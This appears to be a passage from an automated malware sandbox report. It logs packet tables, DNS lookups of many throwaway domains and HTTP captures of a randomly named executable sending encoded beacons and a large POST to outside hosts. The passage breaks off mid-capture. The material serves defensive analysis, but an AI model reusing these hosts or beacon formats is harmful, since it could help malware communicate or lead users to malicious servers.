                      Sep 10, 2024 08:50:21.651910067 CEST8049768104.21.20.125192.168.2.4
                      Sep 10, 2024 08:50:21.651961088 CEST8049768104.21.20.125192.168.2.4
                      Sep 10, 2024 08:50:21.651969910 CEST8049768104.21.20.125192.168.2.4
                      Sep 10, 2024 08:50:21.651987076 CEST8049768104.21.20.125192.168.2.4
                      Sep 10, 2024 08:50:21.651994944 CEST8049768104.21.20.125192.168.2.4
Sep 10, 2024 08:50:21.652039051 CEST | 80 | 49768 | 104.21.20.125 | 192.168.2.4
Sep 10, 2024 08:50:21.652048111 CEST | 80 | 49768 | 104.21.20.125 | 192.168.2.4
Sep 10, 2024 08:50:21.652057886 CEST | 80 | 49768 | 104.21.20.125 | 192.168.2.4
Sep 10, 2024 08:50:22.233865023 CEST | 80 | 49768 | 104.21.20.125 | 192.168.2.4
Sep 10, 2024 08:50:22.233880043 CEST | 80 | 49768 | 104.21.20.125 | 192.168.2.4
Sep 10, 2024 08:50:22.234057903 CEST | 80 | 49768 | 104.21.20.125 | 192.168.2.4
Sep 10, 2024 08:50:22.234148026 CEST | 49768 | 80 | 192.168.2.4 | 104.21.20.125
Sep 10, 2024 08:50:22.234270096 CEST | 49768 | 80 | 192.168.2.4 | 104.21.20.125
Sep 10, 2024 08:50:23.156565905 CEST | 49768 | 80 | 192.168.2.4 | 104.21.20.125
Sep 10, 2024 08:50:24.177740097 CEST | 49769 | 80 | 192.168.2.4 | 104.21.20.125
Sep 10, 2024 08:50:24.182878971 CEST | 80 | 49769 | 104.21.20.125 | 192.168.2.4
Sep 10, 2024 08:50:24.185363054 CEST | 49769 | 80 | 192.168.2.4 | 104.21.20.125
Sep 10, 2024 08:50:24.191428900 CEST | 49769 | 80 | 192.168.2.4 | 104.21.20.125
Sep 10, 2024 08:50:24.196252108 CEST | 80 | 49769 | 104.21.20.125 | 192.168.2.4
Sep 10, 2024 08:50:24.776423931 CEST | 80 | 49769 | 104.21.20.125 | 192.168.2.4
Sep 10, 2024 08:50:24.776447058 CEST | 80 | 49769 | 104.21.20.125 | 192.168.2.4
Sep 10, 2024 08:50:24.776459932 CEST | 80 | 49769 | 104.21.20.125 | 192.168.2.4
Sep 10, 2024 08:50:24.780303955 CEST | 49769 | 80 | 192.168.2.4 | 104.21.20.125
Sep 10, 2024 08:50:24.780303955 CEST | 49769 | 80 | 192.168.2.4 | 104.21.20.125
Sep 10, 2024 08:50:24.785177946 CEST | 80 | 49769 | 104.21.20.125 | 192.168.2.4
Sep 10, 2024 08:50:30.455188990 CEST | 49770 | 80 | 192.168.2.4 | 43.242.202.169
Sep 10, 2024 08:50:30.460007906 CEST | 80 | 49770 | 43.242.202.169 | 192.168.2.4
Sep 10, 2024 08:50:30.460890055 CEST | 49770 | 80 | 192.168.2.4 | 43.242.202.169
Sep 10, 2024 08:50:30.473124027 CEST | 49770 | 80 | 192.168.2.4 | 43.242.202.169
Sep 10, 2024 08:50:30.478884935 CEST | 80 | 49770 | 43.242.202.169 | 192.168.2.4
Sep 10, 2024 08:50:31.342704058 CEST | 80 | 49770 | 43.242.202.169 | 192.168.2.4
Sep 10, 2024 08:50:31.342767954 CEST | 80 | 49770 | 43.242.202.169 | 192.168.2.4
Sep 10, 2024 08:50:31.342813015 CEST | 49770 | 80 | 192.168.2.4 | 43.242.202.169
Sep 10, 2024 08:50:31.985866070 CEST | 49770 | 80 | 192.168.2.4 | 43.242.202.169
Sep 10, 2024 08:50:33.004355907 CEST | 49771 | 80 | 192.168.2.4 | 43.242.202.169
Sep 10, 2024 08:50:33.012254953 CEST | 80 | 49771 | 43.242.202.169 | 192.168.2.4
Sep 10, 2024 08:50:33.012325048 CEST | 49771 | 80 | 192.168.2.4 | 43.242.202.169
Sep 10, 2024 08:50:33.024079084 CEST | 49771 | 80 | 192.168.2.4 | 43.242.202.169
Sep 10, 2024 08:50:33.029759884 CEST | 80 | 49771 | 43.242.202.169 | 192.168.2.4
Sep 10, 2024 08:50:33.880614042 CEST | 80 | 49771 | 43.242.202.169 | 192.168.2.4
Sep 10, 2024 08:50:33.880770922 CEST | 80 | 49771 | 43.242.202.169 | 192.168.2.4
Sep 10, 2024 08:50:33.880814075 CEST | 49771 | 80 | 192.168.2.4 | 43.242.202.169
Sep 10, 2024 08:50:34.534837961 CEST | 49771 | 80 | 192.168.2.4 | 43.242.202.169
Sep 10, 2024 08:50:35.550503969 CEST | 49772 | 80 | 192.168.2.4 | 43.242.202.169
Sep 10, 2024 08:50:35.555402994 CEST | 80 | 49772 | 43.242.202.169 | 192.168.2.4
Sep 10, 2024 08:50:35.555464029 CEST | 49772 | 80 | 192.168.2.4 | 43.242.202.169
Sep 10, 2024 08:50:35.569287062 CEST | 49772 | 80 | 192.168.2.4 | 43.242.202.169
Sep 10, 2024 08:50:35.574337006 CEST | 80 | 49772 | 43.242.202.169 | 192.168.2.4
Sep 10, 2024 08:50:35.574347019 CEST | 80 | 49772 | 43.242.202.169 | 192.168.2.4
Sep 10, 2024 08:50:35.574409008 CEST | 80 | 49772 | 43.242.202.169 | 192.168.2.4
Sep 10, 2024 08:50:35.574417114 CEST | 80 | 49772 | 43.242.202.169 | 192.168.2.4
Sep 10, 2024 08:50:35.574455023 CEST | 80 | 49772 | 43.242.202.169 | 192.168.2.4
Sep 10, 2024 08:50:35.574472904 CEST | 80 | 49772 | 43.242.202.169 | 192.168.2.4
Sep 10, 2024 08:50:35.574543953 CEST | 80 | 49772 | 43.242.202.169 | 192.168.2.4
Sep 10, 2024 08:50:35.574624062 CEST | 80 | 49772 | 43.242.202.169 | 192.168.2.4
Sep 10, 2024 08:50:35.574631929 CEST | 80 | 49772 | 43.242.202.169 | 192.168.2.4
Sep 10, 2024 08:50:36.650837898 CEST | 80 | 49772 | 43.242.202.169 | 192.168.2.4
Sep 10, 2024 08:50:36.651637077 CEST | 80 | 49772 | 43.242.202.169 | 192.168.2.4
Sep 10, 2024 08:50:36.651770115 CEST | 49772 | 80 | 192.168.2.4 | 43.242.202.169
Sep 10, 2024 08:50:37.078576088 CEST | 49772 | 80 | 192.168.2.4 | 43.242.202.169
Sep 10, 2024 08:50:38.101648092 CEST | 49773 | 80 | 192.168.2.4 | 43.242.202.169
Sep 10, 2024 08:50:38.106533051 CEST | 80 | 49773 | 43.242.202.169 | 192.168.2.4
Sep 10, 2024 08:50:38.107466936 CEST | 49773 | 80 | 192.168.2.4 | 43.242.202.169
Sep 10, 2024 08:50:38.113784075 CEST | 49773 | 80 | 192.168.2.4 | 43.242.202.169
Sep 10, 2024 08:50:38.118880987 CEST | 80 | 49773 | 43.242.202.169 | 192.168.2.4
Sep 10, 2024 08:50:38.979907036 CEST | 80 | 49773 | 43.242.202.169 | 192.168.2.4
Sep 10, 2024 08:50:38.979924917 CEST | 80 | 49773 | 43.242.202.169 | 192.168.2.4
Sep 10, 2024 08:50:38.980036974 CEST | 49773 | 80 | 192.168.2.4 | 43.242.202.169
Sep 10, 2024 08:50:38.982748032 CEST | 49773 | 80 | 192.168.2.4 | 43.242.202.169
Sep 10, 2024 08:50:38.987541914 CEST | 80 | 49773 | 43.242.202.169 | 192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 10, 2024 08:48:07.465018988 CEST | 57738 | 53 | 192.168.2.4 | 1.1.1.1
Sep 10, 2024 08:48:07.479814053 CEST | 53 | 57738 | 1.1.1.1 | 192.168.2.4
Sep 10, 2024 08:48:12.487456083 CEST | 61981 | 53 | 192.168.2.4 | 1.1.1.1
Sep 10, 2024 08:48:12.508961916 CEST | 53 | 61981 | 1.1.1.1 | 192.168.2.4
Sep 10, 2024 08:48:28.488284111 CEST | 60850 | 53 | 192.168.2.4 | 1.1.1.1
Sep 10, 2024 08:48:28.542239904 CEST | 53 | 60850 | 1.1.1.1 | 192.168.2.4
Sep 10, 2024 08:48:42.051938057 CEST | 64209 | 53 | 192.168.2.4 | 1.1.1.1
Sep 10, 2024 08:48:42.061791897 CEST | 53 | 64209 | 1.1.1.1 | 192.168.2.4
Sep 10, 2024 08:48:50.128107071 CEST | 49229 | 53 | 192.168.2.4 | 1.1.1.1
Sep 10, 2024 08:48:50.497734070 CEST | 53 | 49229 | 1.1.1.1 | 192.168.2.4
Sep 10, 2024 08:49:04.113327026 CEST | 58820 | 53 | 192.168.2.4 | 1.1.1.1
Sep 10, 2024 08:49:04.291960001 CEST | 53 | 58820 | 1.1.1.1 | 192.168.2.4
Sep 10, 2024 08:49:17.758831024 CEST | 63521 | 53 | 192.168.2.4 | 1.1.1.1
Sep 10, 2024 08:49:18.196357012 CEST | 53 | 63521 | 1.1.1.1 | 192.168.2.4
Sep 10, 2024 08:49:31.754637957 CEST | 63912 | 53 | 192.168.2.4 | 1.1.1.1
Sep 10, 2024 08:49:32.053291082 CEST | 53 | 63912 | 1.1.1.1 | 192.168.2.4
Sep 10, 2024 08:49:45.362951994 CEST | 57655 | 53 | 192.168.2.4 | 1.1.1.1
Sep 10, 2024 08:49:45.413435936 CEST | 53 | 57655 | 1.1.1.1 | 192.168.2.4
Sep 10, 2024 08:49:58.738811016 CEST | 51192 | 53 | 192.168.2.4 | 1.1.1.1
Sep 10, 2024 08:49:59.750818014 CEST | 51192 | 53 | 192.168.2.4 | 1.1.1.1
Sep 10, 2024 08:50:00.769584894 CEST | 51192 | 53 | 192.168.2.4 | 1.1.1.1
Sep 10, 2024 08:50:02.765942097 CEST | 51192 | 53 | 192.168.2.4 | 1.1.1.1
Sep 10, 2024 08:50:02.851320982 CEST | 53 | 51192 | 1.1.1.1 | 192.168.2.4
Sep 10, 2024 08:50:02.851332903 CEST | 53 | 51192 | 1.1.1.1 | 192.168.2.4
Sep 10, 2024 08:50:02.851341963 CEST | 53 | 51192 | 1.1.1.1 | 192.168.2.4
Sep 10, 2024 08:50:02.851358891 CEST | 53 | 51192 | 1.1.1.1 | 192.168.2.4
Sep 10, 2024 08:50:16.473834991 CEST | 63574 | 53 | 192.168.2.4 | 1.1.1.1
Sep 10, 2024 08:50:16.491364002 CEST | 53 | 63574 | 1.1.1.1 | 192.168.2.4
Sep 10, 2024 08:50:29.792268991 CEST | 49547 | 53 | 192.168.2.4 | 1.1.1.1
Sep 10, 2024 08:50:30.450336933 CEST | 53 | 49547 | 1.1.1.1 | 192.168.2.4
Sep 10, 2024 08:50:44.457495928 CEST | 56269 | 53 | 192.168.2.4 | 1.1.1.1
Sep 10, 2024 08:50:44.469816923 CEST | 53 | 56269 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Sep 10, 2024 08:48:07.465018988 CEST | 192.168.2.4 | 1.1.1.1 | 0x27f8 | Standard query (0) | www.monos.shop | A (IP address) | IN (0x0001) | false
Sep 10, 2024 08:48:12.487456083 CEST | 192.168.2.4 | 1.1.1.1 | 0x7769 | Standard query (0) | www.726075.buzz | A (IP address) | IN (0x0001) | false
Sep 10, 2024 08:48:28.488284111 CEST | 192.168.2.4 | 1.1.1.1 | 0xa48d | Standard query (0) | www.freepicture.online | A (IP address) | IN (0x0001) | false
Sep 10, 2024 08:48:42.051938057 CEST | 192.168.2.4 | 1.1.1.1 | 0x1334 | Standard query (0) | www.318st.com | A (IP address) | IN (0x0001) | false
Sep 10, 2024 08:48:50.128107071 CEST | 192.168.2.4 | 1.1.1.1 | 0x4c2d | Standard query (0) | www.hm62t.top | A (IP address) | IN (0x0001) | false
Sep 10, 2024 08:49:04.113327026 CEST | 192.168.2.4 | 1.1.1.1 | 0x20ef | Standard query (0) | www.golbasi-nakliyat.xyz | A (IP address) | IN (0x0001) | false
Sep 10, 2024 08:49:17.758831024 CEST | 192.168.2.4 | 1.1.1.1 | 0x98c7 | Standard query (0) | www.mfgamecompany.shop | A (IP address) | IN (0x0001) | false
Sep 10, 2024 08:49:31.754637957 CEST | 192.168.2.4 | 1.1.1.1 | 0x9ea4 | Standard query (0) | www.quilo.life | A (IP address) | IN (0x0001) | false
Sep 10, 2024 08:49:45.362951994 CEST | 192.168.2.4 | 1.1.1.1 | 0xb606 | Standard query (0) | www.qiluqiyuan.buzz | A (IP address) | IN (0x0001) | false
Sep 10, 2024 08:49:58.738811016 CEST | 192.168.2.4 | 1.1.1.1 | 0xc14d | Standard query (0) | www.bola88site.one | A (IP address) | IN (0x0001) | false
Sep 10, 2024 08:49:59.750818014 CEST | 192.168.2.4 | 1.1.1.1 | 0xc14d | Standard query (0) | www.bola88site.one | A (IP address) | IN (0x0001) | false
Sep 10, 2024 08:50:00.769584894 CEST | 192.168.2.4 | 1.1.1.1 | 0xc14d | Standard query (0) | www.bola88site.one | A (IP address) | IN (0x0001) | false
Sep 10, 2024 08:50:02.765942097 CEST | 192.168.2.4 | 1.1.1.1 | 0xc14d | Standard query (0) | www.bola88site.one | A (IP address) | IN (0x0001) | false
Sep 10, 2024 08:50:16.473834991 CEST | 192.168.2.4 | 1.1.1.1 | 0x32c5 | Standard query (0) | www.kckartal.xyz | A (IP address) | IN (0x0001) | false
Sep 10, 2024 08:50:29.792268991 CEST | 192.168.2.4 | 1.1.1.1 | 0x6e5f | Standard query (0) | www.mizuquan.top | A (IP address) | IN (0x0001) | false
Sep 10, 2024 08:50:44.457495928 CEST | 192.168.2.4 | 1.1.1.1 | 0xc422 | Standard query (0) | www.kxshopmr.store | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Sep 10, 2024 08:48:07.479814053 CEST | 1.1.1.1 | 192.168.2.4 | 0x27f8 | Name error (3) | www.monos.shop | none | none | A (IP address) | IN (0x0001) | false
Sep 10, 2024 08:48:12.508961916 CEST | 1.1.1.1 | 192.168.2.4 | 0x7769 | No error (0) | www.726075.buzz | | 47.57.185.227 | A (IP address) | IN (0x0001) | false
Sep 10, 2024 08:48:28.542239904 CEST | 1.1.1.1 | 192.168.2.4 | 0xa48d | No error (0) | www.freepicture.online | freepicture.online | | CNAME (Canonical name) | IN (0x0001) | false
Sep 10, 2024 08:48:28.542239904 CEST | 1.1.1.1 | 192.168.2.4 | 0xa48d | No error (0) | freepicture.online | | 89.58.49.1 | A (IP address) | IN (0x0001) | false
Sep 10, 2024 08:48:42.061791897 CEST | 1.1.1.1 | 192.168.2.4 | 0x1334 | Name error (3) | www.318st.com | none | none | A (IP address) | IN (0x0001) | false
Sep 10, 2024 08:48:50.497734070 CEST | 1.1.1.1 | 192.168.2.4 | 0x4c2d | No error (0) | www.hm62t.top | hm62t.top | | CNAME (Canonical name) | IN (0x0001) | false
Sep 10, 2024 08:48:50.497734070 CEST | 1.1.1.1 | 192.168.2.4 | 0x4c2d | No error (0) | hm62t.top | | 154.23.184.240 | A (IP address) | IN (0x0001) | false
Sep 10, 2024 08:49:04.291960001 CEST | 1.1.1.1 | 192.168.2.4 | 0x20ef | No error (0) | www.golbasi-nakliyat.xyz | redirect.natrocdn.com | | CNAME (Canonical name) | IN (0x0001) | false
Sep 10, 2024 08:49:04.291960001 CEST | 1.1.1.1 | 192.168.2.4 | 0x20ef | No error (0) | redirect.natrocdn.com | natroredirect.natrocdn.com | | CNAME (Canonical name) | IN (0x0001) | false
Sep 10, 2024 08:49:04.291960001 CEST | 1.1.1.1 | 192.168.2.4 | 0x20ef | No error (0) | natroredirect.natrocdn.com | | 85.159.66.93 | A (IP address) | IN (0x0001) | false
Sep 10, 2024 08:49:18.196357012 CEST | 1.1.1.1 | 192.168.2.4 | 0x98c7 | No error (0) | www.mfgamecompany.shop | mfgamecompany.shop | | CNAME (Canonical name) | IN (0x0001) | false
Sep 10, 2024 08:49:18.196357012 CEST | 1.1.1.1 | 192.168.2.4 | 0x98c7 | No error (0) | mfgamecompany.shop | | 185.173.111.76 | A (IP address) | IN (0x0001) | false
Sep 10, 2024 08:49:32.053291082 CEST | 1.1.1.1 | 192.168.2.4 | 0x9ea4 | No error (0) | www.quilo.life | | 203.161.43.228 | A (IP address) | IN (0x0001) | false
Sep 10, 2024 08:49:45.413435936 CEST | 1.1.1.1 | 192.168.2.4 | 0xb606 | No error (0) | www.qiluqiyuan.buzz | | 161.97.168.245 | A (IP address) | IN (0x0001) | false
Sep 10, 2024 08:50:02.851320982 CEST | 1.1.1.1 | 192.168.2.4 | 0xc14d | No error (0) | www.bola88site.one | bola88site.one | | CNAME (Canonical name) | IN (0x0001) | false
Sep 10, 2024 08:50:02.851320982 CEST | 1.1.1.1 | 192.168.2.4 | 0xc14d | No error (0) | bola88site.one | | 172.96.191.39 | A (IP address) | IN (0x0001) | false
Sep 10, 2024 08:50:02.851332903 CEST | 1.1.1.1 | 192.168.2.4 | 0xc14d | No error (0) | www.bola88site.one | bola88site.one | | CNAME (Canonical name) | IN (0x0001) | false
Sep 10, 2024 08:50:02.851332903 CEST | 1.1.1.1 | 192.168.2.4 | 0xc14d | No error (0) | bola88site.one | | 172.96.191.39 | A (IP address) | IN (0x0001) | false
Sep 10, 2024 08:50:02.851341963 CEST | 1.1.1.1 | 192.168.2.4 | 0xc14d | No error (0) | www.bola88site.one | bola88site.one | | CNAME (Canonical name) | IN (0x0001) | false
Sep 10, 2024 08:50:02.851341963 CEST | 1.1.1.1 | 192.168.2.4 | 0xc14d | No error (0) | bola88site.one | | 172.96.191.39 | A (IP address) | IN (0x0001) | false
Sep 10, 2024 08:50:02.851358891 CEST | 1.1.1.1 | 192.168.2.4 | 0xc14d | No error (0) | www.bola88site.one | bola88site.one | | CNAME (Canonical name) | IN (0x0001) | false
Sep 10, 2024 08:50:02.851358891 CEST | 1.1.1.1 | 192.168.2.4 | 0xc14d | No error (0) | bola88site.one | | 172.96.191.39 | A (IP address) | IN (0x0001) | false
Sep 10, 2024 08:50:16.491364002 CEST | 1.1.1.1 | 192.168.2.4 | 0x32c5 | No error (0) | www.kckartal.xyz | | 104.21.20.125 | A (IP address) | IN (0x0001) | false
Sep 10, 2024 08:50:16.491364002 CEST | 1.1.1.1 | 192.168.2.4 | 0x32c5 | No error (0) | www.kckartal.xyz | | 172.67.192.227 | A (IP address) | IN (0x0001) | false
Sep 10, 2024 08:50:30.450336933 CEST | 1.1.1.1 | 192.168.2.4 | 0x6e5f | No error (0) | www.mizuquan.top | | 43.242.202.169 | A (IP address) | IN (0x0001) | false
Sep 10, 2024 08:50:44.469816923 CEST | 1.1.1.1 | 192.168.2.4 | 0xc422 | Name error (3) | www.kxshopmr.store | none | none | A (IP address) | IN (0x0001) | false
                      • www.726075.buzz
                      • www.freepicture.online
                      • www.hm62t.top
                      • www.golbasi-nakliyat.xyz
                      • www.mfgamecompany.shop
                      • www.quilo.life
                      • www.qiluqiyuan.buzz
                      • www.bola88site.one
                      • www.kckartal.xyz
                      • www.mizuquan.top
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49736 | 47.57.185.227 | 80 | 1880 | C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe
Timestamp | Bytes transferred | Direction | Data
Sep 10, 2024 08:48:12.525230885 CEST | 458 | OUT | GET /w9nd/?chHT=9dRK0h7YIJsGSRnhz7V9NsNj7P/k9yHBPHBwJCn+XP7nQ6BgyCo2QTTghBp7CnsQKe5GALi32E4BE+loUVZtqUckbqGSyTGH7gwVeueowUmtWPR1ijKwEtw=&bd=rj1X_pBPLTnXd0 HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en
                      Host: www.726075.buzz
                      Connection: close
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Sep 10, 2024 08:48:13.436589003 CEST | 302 | IN | HTTP/1.1 404 Not Found
                      Server: nginx
                      Date: Tue, 10 Sep 2024 06:48:13 GMT
                      Content-Type: text/html
                      Content-Length: 138
                      Connection: close
                      ETag: "6663edd0-8a"
                      Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49737 | 89.58.49.1 | 80 | 1880 | C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe
Timestamp | Bytes transferred | Direction | Data
Sep 10, 2024 08:48:28.559892893 CEST | 740 | OUT | POST /xcfw/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en
                      Host: www.freepicture.online
                      Origin: http://www.freepicture.online
                      Referer: http://www.freepicture.online/xcfw/
                      Content-Type: application/x-www-form-urlencoded
                      Connection: close
                      Content-Length: 201
                      Cache-Control: max-age=0
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                      Data Raw: 63 68 48 54 3d 57 68 2b 56 47 4e 75 4c 42 49 59 61 2f 41 4b 70 77 30 4d 37 4f 6c 64 39 75 71 6d 31 79 5a 56 70 4d 72 46 4a 79 57 45 2f 33 56 38 2f 48 55 66 4d 32 48 49 44 34 59 63 63 73 61 6d 77 58 72 2b 64 47 58 4c 41 49 58 57 79 4b 44 35 39 74 68 51 36 43 47 78 75 71 79 2f 44 46 64 35 54 66 74 4b 42 6d 69 50 54 46 43 31 68 33 61 39 46 69 43 67 34 58 57 55 57 31 41 77 4a 38 68 48 56 54 31 4b 36 31 49 59 37 58 61 78 34 69 2b 6d 44 49 78 30 58 4a 57 52 6b 58 72 58 72 6e 6f 77 2b 5a 45 53 6c 71 70 71 4d 71 51 49 6b 31 47 71 58 76 74 64 58 32 77 38 75 36 4b 69 61 63 32 2b 35 48 76 58 65 6f 51 3d 3d
                      Data Ascii: chHT=Wh+VGNuLBIYa/AKpw0M7Old9uqm1yZVpMrFJyWE/3V8/HUfM2HID4YccsamwXr+dGXLAIXWyKD59thQ6CGxuqy/DFd5TftKBmiPTFC1h3a9FiCg4XWUW1AwJ8hHVT1K61IY7Xax4i+mDIx0XJWRkXrXrnow+ZESlqpqMqQIk1GqXvtdX2w8u6Kiac2+5HvXeoQ==
Sep 10, 2024 08:48:29.177470922 CEST | 360 | IN | HTTP/1.1 404 Not Found
                      Date: Tue, 10 Sep 2024 06:48:29 GMT
                      Server: Apache
                      Content-Length: 196
                      Connection: close
                      Content-Type: text/html; charset=iso-8859-1
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49738 | 89.58.49.1 | 80 | 1880 | C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe
Timestamp | Bytes transferred | Direction | Data
Sep 10, 2024 08:48:31.301776886 CEST | 760 | OUT | POST /xcfw/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en
                      Host: www.freepicture.online
                      Origin: http://www.freepicture.online
                      Referer: http://www.freepicture.online/xcfw/
                      Content-Type: application/x-www-form-urlencoded
                      Connection: close
                      Content-Length: 221
                      Cache-Control: max-age=0
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                      Data Raw: 63 68 48 54 3d 57 68 2b 56 47 4e 75 4c 42 49 59 61 2b 6a 53 70 39 30 77 37 5a 31 64 36 72 71 6d 31 34 35 56 6c 4d 72 42 4a 79 53 64 30 33 47 59 2f 48 32 58 4d 33 43 6b 44 31 34 63 63 34 4b 6d 31 5a 4c 2b 44 47 58 48 69 49 53 32 79 4b 44 39 39 74 67 67 36 43 33 78 70 6f 69 2f 46 44 64 35 52 52 4e 4b 42 6d 69 50 54 46 43 68 48 33 61 6c 46 69 78 34 34 58 33 55 52 32 41 77 4b 37 68 48 56 5a 56 4c 53 31 49 5a 75 58 66 56 65 69 38 65 44 49 78 6b 58 4a 69 39 6e 65 72 58 70 74 49 78 37 55 6e 76 4b 6a 61 66 64 6e 43 45 36 2b 48 32 4f 6e 4c 4d 4e 6e 42 64 35 6f 4b 47 70 42 78 33 4e 4b 73 71 58 7a 64 4b 36 37 6a 65 4f 79 51 52 6c 53 53 68 36 5a 61 6e 56 4c 67 30 3d
                      Data Ascii: chHT=Wh+VGNuLBIYa+jSp90w7Z1d6rqm145VlMrBJySd03GY/H2XM3CkD14cc4Km1ZL+DGXHiIS2yKD99tgg6C3xpoi/FDd5RRNKBmiPTFChH3alFix44X3UR2AwK7hHVZVLS1IZuXfVei8eDIxkXJi9nerXptIx7UnvKjafdnCE6+H2OnLMNnBd5oKGpBx3NKsqXzdK67jeOyQRlSSh6ZanVLg0=
Sep 10, 2024 08:48:31.928316116 CEST | 360 | IN | HTTP/1.1 404 Not Found
                      Date: Tue, 10 Sep 2024 06:48:31 GMT
                      Server: Apache
                      Content-Length: 196
                      Connection: close
                      Content-Type: text/html; charset=iso-8859-1
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49740 | 89.58.49.1 | 80 | 1880 | C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe
Timestamp | Bytes transferred | Direction | Data
Sep 10, 2024 08:48:33.844938040 CEST | 10842 | OUT | POST /xcfw/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en
                      Host: www.freepicture.online
                      Origin: http://www.freepicture.online
                      Referer: http://www.freepicture.online/xcfw/
                      Content-Type: application/x-www-form-urlencoded
                      Connection: close
                      Content-Length: 10301
                      Cache-Control: max-age=0
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
